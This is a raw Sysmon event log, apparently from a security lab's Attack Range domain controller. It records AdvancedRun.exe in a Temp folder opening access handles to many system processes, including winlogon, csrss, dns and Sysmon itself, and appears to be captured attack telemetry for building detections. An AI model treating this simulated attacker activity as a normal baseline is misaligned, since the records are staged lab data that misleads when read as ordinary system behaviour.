22:21:53.753{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E500-000000002402}4164C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.753{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E400-000000002402}4156C:\Windows\system32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.753{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E300-000000002402}4104C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E200-000000002402}2056C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DF00-000000002402}908C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000002968407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DD00-000000002402}4000C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DC00-000000002402}2092C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0B37-61E7-8500-000000002402}500C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-4300-000000002402}3476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-3F00-000000002402}3388C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABF-61E7-3800-000000002402}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-3000-000000002402}2304C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2E00-000000002402}3044C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2D00-000000002402}3032C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2C00-000000002402}2984C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2B00-000000002402}2976C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2A00-000000002402}2960C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2900-000000002402}2948C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\Advanced